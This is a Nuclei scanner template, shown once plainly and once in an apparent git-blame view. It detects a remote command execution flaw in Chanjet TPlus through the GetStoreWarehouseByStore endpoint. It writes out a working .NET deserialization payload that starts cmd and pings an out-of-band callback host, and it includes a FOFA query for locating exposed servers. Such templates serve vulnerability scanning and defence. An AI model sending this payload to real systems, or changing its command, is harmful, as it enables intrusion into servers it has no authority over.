nuclei-templates/http/vulnerabilities/chanjet-tplus-rce.yaml

id: chanjet-tplus-rce

info:
  name: Chanjet TPlus GetStoreWarehouseByStore - Remote Command Execution
  author: SleepingBag945
  severity: critical
  description: |
    Changjet Tplus has a front-end remote code execution vulnerability. An attacker can use the GetStoreWarehouseByStore method to inject a serialized payload and execute arbitrary commands. This ultimately results in leakage of sensitive server information or code execution.
  reference:
    - https://peiqi.wgpsec.org/wiki/webapp/%E7%94%A8%E5%8F%8B/%E7%94%A8%E5%8F%8B%20%E7%95%85%E6%8D%B7%E9%80%9AT+%20GetStoreWarehouseByStore%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.html
    - https://github.com/MrWQ/vulnerability-paper/blob/7551f7584bd35039028b1d9473a00201ed18e6b2/bugs/%E7%95%85%E6%8D%B7%E9%80%9A%20T%2B%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.md
  metadata:
    verified: true
    max-request: 1
    fofa-query: app="畅捷通-TPlus"
  tags: chanjettplus,rce,oast

http:
  - raw:
      - |
        POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1
        Host: {{Hostname}}
        X-Ajaxpro-Method: GetStoreWarehouseByStore

        {
          "storeID":{
            "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
            "MethodName":"Start",
            "ObjectInstance":{
            "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
            "StartInfo":{
              "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
              "FileName":"cmd",
              "Arguments":"/c ping {{interactsh-url}}"
            }
            }
          }
        }

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "actorId或archivesId不能为空"
          - "\"Type\":\"System.ArgumentException\""
          - "Object reference not set to an instance of an object"
          - "System.NullReferenceException"
        condition: or

      - type: word
        part: interactsh_protocol
        words:
          - "dns"

# digest: 4a0a00473045022100a53bafe7dde75005e55a9259ee5b6aad04aac009d8be109b138092abf7d6a679022015b544b5d2492ef8e250701b35fc6d1ba30a0e8d0648f96c32d074bfb6c3e1d9:922c64590222798bb761d5b6d8e72950
Templates - update 2023-09-15 12:23:57 +00:00			`id: chanjet-tplus-rce`

			`info:`
			`name: Chanjet TPlus GetStoreWarehouseByStore - Remote Command Execution`
			`author: SleepingBag945`
			`severity: critical`
			`description: \|`
			`Changjet Tplus has a front-end remote code execution vulnerability. An attacker can use the GetStoreWarehouseByStore method to inject a serialized payload and execute arbitrary commands. This ultimately results in leakage of sensitive server information or code execution.`
			`reference:`
			`- https://peiqi.wgpsec.org/wiki/webapp/%E7%94%A8%E5%8F%8B/%E7%94%A8%E5%8F%8B%20%E7%95%85%E6%8D%B7%E9%80%9AT+%20GetStoreWarehouseByStore%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.html`
			`- https://github.com/MrWQ/vulnerability-paper/blob/7551f7584bd35039028b1d9473a00201ed18e6b2/bugs/%E7%95%85%E6%8D%B7%E9%80%9A%20T%2B%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.md`
			`metadata:`
			`verified: true`
templateman update 2023-10-14 11:27:55 +00:00			`max-request: 1`
			`fofa-query: app="畅捷通-TPlus"`
fixed OAST 2023-09-18 12:52:23 +00:00			`tags: chanjettplus,rce,oast`
Templates - update 2023-09-15 12:23:57 +00:00
			`http:`
			`- raw:`
			`- \|`
			`POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1`
			`Host: {{Hostname}}`
			`X-Ajaxpro-Method: GetStoreWarehouseByStore`

			`{`
			`"storeID":{`
			`"__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",`
			`"MethodName":"Start",`
			`"ObjectInstance":{`
			`"__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",`
			`"StartInfo":{`
			`"__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",`
			`"FileName":"cmd",`
			`"Arguments":"/c ping {{interactsh-url}}"`
			`}`
			`}`
			`}`
			`}`

fixed OAST 2023-09-18 12:52:23 +00:00			`matchers-condition: and`
Templates - update 2023-09-15 12:23:57 +00:00			`matchers:`
			`- type: word`
			`part: body`
			`words:`
			`- "actorId或archivesId不能为空"`
			`- "\"Type\":\"System.ArgumentException\""`
			`- "Object reference not set to an instance of an object"`
			`- "System.NullReferenceException"`
			`condition: or`

			`- type: word`
			`part: interactsh_protocol`
			`words:`
fixed OAST 2023-09-18 12:52:23 +00:00			`- "dns"`
TemplateMan Update [Fri Oct 20 11:41:12 UTC 2023] :robot: 2023-10-20 11:41:13 +00:00
			`# digest: 4a0a00473045022100a53bafe7dde75005e55a9259ee5b6aad04aac009d8be109b138092abf7d6a679022015b544b5d2492ef8e250701b35fc6d1ba30a0e8d0648f96c32d074bfb6c3e1d9:922c64590222798bb761d5b6d8e72950`